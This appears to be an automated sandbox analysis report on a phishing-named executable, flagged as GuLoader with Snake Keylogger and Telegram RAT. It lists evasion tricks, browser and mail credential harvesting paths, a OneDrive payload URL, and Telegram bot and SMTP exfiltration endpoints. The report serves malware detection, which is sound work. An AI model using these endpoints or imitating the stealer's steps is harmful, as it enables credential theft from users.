Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598343 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598234 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598125 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598015 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597906 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597797 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597687 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597567 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597453 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597343 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597234 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597125 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597015 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596906 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596796 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596687 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596578 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596468 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596359 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596250 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596140 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596031 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595922 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595797 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595687 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595578 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595468 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595359 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595248 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595140 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595031 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 594921 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 594812 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 594670 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 594562 Jump to behavior
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4179387047.0000000003378000.00000004.00000020.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4179387047.00000000033CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe API call chain: ExitProcess graph end node
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_00404243 LdrInitializeThunk,SendMessageW, 0_2_00404243
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_73401B63 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_73401B63
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_02EF3E8D mov edx, dword ptr fs:[00000030h] 2_2_02EF3E8D
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_02EF3E5B mov edx, dword ptr fs:[00000030h] 2_2_02EF3E5B
Enables debug privileges
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Memory allocated: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process created: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Queries volume information: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_0040336C EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess, 0_2_0040336C
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000002.00000002.4201423308.00000000339C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: PayeeAdvice_HK54912_R0038704_37504.exe PID: 6104, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000002.00000002.4201423308.0000000033AC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: PayeeAdvice_HK54912_R0038704_37504.exe PID: 6104, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000002.00000002.4201423308.00000000339C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: PayeeAdvice_HK54912_R0038704_37504.exe PID: 6104, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559227 Sample: PayeeAdvice_HK54912_R003870... Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 17 reallyfreegeoip.org 2->17 19 api.telegram.org 2->19 21 9 other IPs or domains 2->21 29 Found malware configuration 2->29 31 Multi AV Scanner detection for submitted file 2->31 33 Yara detected GuLoader 2->33 39 4 other signatures 2->39 7 PayeeAdvice_HK54912_R0038704_37504.exe 2 29 2->7         started        signatures3 35 Tries to detect the country of the analysis system (by using the IP) 17->35 37 Uses the Telegram API (likely for C&C communication) 19->37 process4 file5 15 C:\Users\user\AppData\Local\...\System.dll, PE32 7->15 dropped 41 Tries to detect virtualization through RDTSC time measurements 7->41 43 Switches to a custom stack to bypass stack traces 7->43 11 PayeeAdvice_HK54912_R0038704_37504.exe 15 14 7->11         started        signatures6 process7 dnsIp8 23 foodex.com.pk 37.27.123.72, 49756, 587 UNINETAZ Iran (ISLAMIC Republic Of) 11->23 25 checkip.dyndns.com 132.226.8.169, 49738, 49741, 49743 UTMEMUS United States 11->25 27 3 other IPs or domains 11->27 45 Tries to steal Mail credentials (via file / registry access) 11->45 47 Tries to harvest and steal browser information (history, passwords, etc) 11->47 signatures9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
13.107.43.12
 l-0003.l-dc-msedge.net United States
8068 MICROSOFT-CORP-MSN-AS-BLOCKUS false
132.226.8.169
 checkip.dyndns.com United States
16989 UTMEMUS false
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
188.114.96.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS false
37.27.123.72
 foodex.com.pk Iran (ISLAMIC Republic Of)
39232 UNINETAZ true

Contacted Domains

Name IP Active
l-0003.l-dc-msedge.net 13.107.43.12 true
reallyfreegeoip.org 188.114.96.3 true
foodex.com.pk 37.27.123.72 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 132.226.8.169 true
4jjxew.dm.files.1drv.com unknown unknown
mail.foodex.com.pk unknown unknown
api.onedrive.com unknown unknown
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://4jjxew.dm.files.1drv.com/y4mO9x8ZxntK8YWdNZ0APFyw4ftQiKEA3b9ah1Wz-M1CglBAT974LE8XumXkuL0QoN-7vR_btDJUwSahkUS2M93xLAAR6xUxBf6NEExd3XZo57-YMEfTx94x1QxOp2a-8hq__KMNGGaakccwQ1sWJGhyaRsLbTLnjBQxVFJ7n1h5l7q4yyhOY91F-AdnfAux6c4nzAxrfVrEgoQU3Nn3oITjw/KwTCIrYgMbvy217.bin false
  • Avira URL Cloud: safe
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841675%0D%0ADate%20and%20Time:%2020/11/2024%20/%2019:18:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841675%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
    		high
    https://reallyfreegeoip.org/xml/8.46.123.75 false
      		high
      http://checkip.dyndns.org/ false
        		high